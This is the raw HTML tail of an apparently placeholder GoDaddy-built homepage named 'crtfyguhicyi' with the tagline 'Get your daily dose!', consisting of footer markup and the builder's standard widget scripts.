c1-4b c1-4c c1-1e c1-2k c1-2b c1-2c c1-s c1-y c1-4d c1-4e c1-4f c1-4g c1-4h c1-4i c1-7k c1-1v c1-b c1-4k c1-4l c1-3v c1-7l c1-4n c1-4o c1-4p c1-7m c1-7n c1-6r c1-6s c1-7o c1-4q c1-3w c1-3x c1-3y c1-3z">Sign up</button></div></form></div></div></div></div></div></div></div></div></section> </div></div></div><div id="84018e6c-a859-4f30-b691-b5ffe8050167" class="widget widget-footer widget-footer-footer-2"><div data-ux="Widget" role="contentinfo" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-3 c1-7p c1-7q c1-b c1-c c1-7r c1-7s c1-d c1-e c1-f c1-g"><div data-ux="Divider" class="x-el x-el-div c1-1 c1-2 c1-3 c1-7t c1-7u c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><hr aria-hidden="true" role="separator" data-ux="HR" class="x-el x-el-hr c1-1 c1-2 c1-6v c1-6y c1-6i c1-1a c1-1c c1-4 c1-b c1-c c1-d c1-e c1-f c1-g"/></div></div><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Layout" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-16 c1-17 c1-18 c1-19 c1-1a c1-33 c1-1c c1-32 c1-4b c1-1e c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-7v c1-1p c1-1q c1-y c1-1r c1-3p c1-1t c1-3o c1-b c1-c c1-d c1-7w c1-7x c1-e c1-f c1-g"><div data-ux="FooterDetails" data-aid="FOOTER_COPYRIGHT_RENDERED" data-typography="DetailsAlpha" class="x-el x-el-p c1-1 c1-2 c1-2c c1-2b c1-59 c1-1a c1-1c c1-b c1-7y c1-3v c1-35 c1-3w c1-7z c1-3x c1-3y c1-3z x-rt"><p style="margin:0"><span>Copyright © 2020 crtfyguhicyi - All Rights Reserved.</span></p></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-7v c1-1p c1-1q c1-y c1-1r c1-3p c1-1t c1-3o c1-b c1-c c1-d c1-7w c1-7x c1-e c1-f c1-g"><p data-ux="FooterDetails" data-aid="FOOTER_POWERED_BY_RENDERED" data-typography="DetailsAlpha" class="x-el x-el-p c1-1 c1-2 c1-2c c1-2b c1-59 c1-z c1-1c c1-b c1-7y c1-3v c1-35 c1-3w c1-80 c1-6m c1-3x c1-3y c1-3z"><span>Powered by GoDaddy <a rel="nofollow noopener" role="link" aria-haspopup="true" data-ux="Link" target="_blank" data-aid="FOOTER_POWERED_BY_RENDERED_LINK" href="https://www.godaddy.com/websites/website-builder?isc=pwugc&amp;utm_source=wsb&amp;utm_medium=applications&amp;utm_campaign=en-us_corp_applications_base" data-typography="LinkAlpha" class="x-el x-el-a c1-2i c1-2j c1-2k c1-2c c1-2b c1-2l c1-2m c1-z c1-b c1-81 c1-3v c1-2s c1-82 c1-83 c1-3w c1-80 c1-6m c1-3x c1-3y c1-3z" data-tccl="ux2.FOOTER.footer2.Layout.Default.Link.Default.75941.click,click">Website Builder</a></span></p></div></div></div></div></section> </div></div></div><div id="0abcb62f-39d9-4b35-be8a-6e02e21bf958" class="widget widget-cookie-banner widget-cookie-banner-cookie-1"><div id="bs-6"></div></div><div id="96eb0081-b7a8-4e9a-9fbd-72281e9ec4f0" class="widget widget-messaging widget-messaging-messaging-1"></div></div></div></div>
<script type="text/javascript" src="//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.3.67.2.js" crossorigin></script>
<script type="text/javascript">window.cxs && window.cxs.setOptions({ prefix: "c2-" });</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/ce9e48199a78dc98/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/bcacf129327749e6/script.js" crossorigin></script>
<script type="text/javascript">window.wsb['context-bs-1']={"renderMode":"PUBLISH","fonts":["muli","default",""],"colors":["#53DEBF"],"fontScale":"medium","locale":"en-US","language":"en","internalLinks":{},"isHomepage":true,"navigationMap":{"2dbc3c68-54c1-4511-8f4b-14af5ec7c5f0":{"isFlyoutMenu":false,"active":true,"pageId":"2dbc3c68-54c1-4511-8f4b-14af5ec7c5f0","name":"Home","href":"\u002F","target":"","visible":true,"requiresAuth":false,"tags":[],"rel":"","type":"page","showInFooter":false}},"theme":"Theme21","paintJob":"CUSTOM"};</script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-1',
          componentName:'FreemiumAd',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:false
        });
      })({"adDomain":"freemium.api.godaddy.com","viewDevice":"","adEndpoint":"\u002Fmarkup\u002Fad","widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","section":"default","category":"neutral","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","widgetType":"HEADER","widgetPreset":"header9","section":"default","category":"neutral","fontSize":"medium","fontFamily":"alternate","group":"Widget","websiteThemeOverrides":{},"widgetThemeOverrides":{}});</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/371c18f3a9e22f67/script.js" crossorigin></script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-2',
          componentName:'DynamicFontScaler',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:false
        });
      })({"text":"crtfyguhicyi","containerId":"logo-container-75936","targetId":"logo-text-75937","fontSizes":["xxlarge","xlarge","large"],"maxLines":8,"style":{"display":"inline-block","maxWidth":"100%"},"prioritizeDefault":true,"widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","section":"default","category":"primary","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","widgetType":"HEADER","widgetPreset":"header9","section":"default","category":"primary","fontSize":"xxlarge","fontFamily":"primary","group":"Logo","groupType":"Default","websiteThemeOverrides":{},"widgetThemeOverrides":{}});</script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-3',
          componentName:'DynamicFontScaler',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:false
        });
      })({"font":"primary","text":"Get your daily dose!","containerId":"tagline-container-75938","targetId":"dynamic-tagline-75939","fontSizes":["medium","small","xsmall"],"maxLines":4,"style":{"display":"inline-block","maxWidth":"100%","whiteSpace":"pre-line"},"widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","section":"default","category":"primary","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6","widgetType":"HEADER","widgetPreset":"header9","section":"default","category":"primary","fontSize":"medium","fontFamily":"primary","group":"Hero","groupType":"Default","websiteThemeOverrides":{},"widgetThemeOverrides":{}});</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/791674e5f2ec4655/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/1022ef3fa29e4c5d/script.js" crossorigin></script>
<script type="text/javascript">Number(window.vctElements)||(window.vctElements=0),window.vctElements++,window.markVisuallyComplete();</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/18cca9b388040fc1/script.js" crossorigin></script>
<script type="text/javascript">window.wsb['context-f193be48-0795-4d80-a0c2-8b32598306ef-bootstrap-container']={"renderMode":"PUBLISH","fonts":["muli","default",""],"colors":["#53DEBF"],"fontScale":"medium","locale":"en-US","language":"en","internalLinks":{},"isHomepage":true,"navigationMap":{"2dbc3c68-54c1-4511-8f4b-14af5ec7c5f0":{"isFlyoutMenu":false,"active":true,"pageId":"2dbc3c68-54c1-4511-8f4b-14af5ec7c5f0","name":"Home","href":"\u002F","target":"","visible":true,"requiresAuth":false,"tags":[],"rel":"","type":"page","showInFooter":false}},"theme":"Theme21"};</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/5421c49817fe280c/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/42fce4663c179bdb/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/a68e5c847cd22cf4/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/bdd9fd307970c680/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/de106938e4a3fbae/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/64a798aba33c3d0a/script.js" crossorigin></script>
<script type="text/javascript">document.getElementById('page-75933').addEventListener('click', function() {}, false);</script></body></html>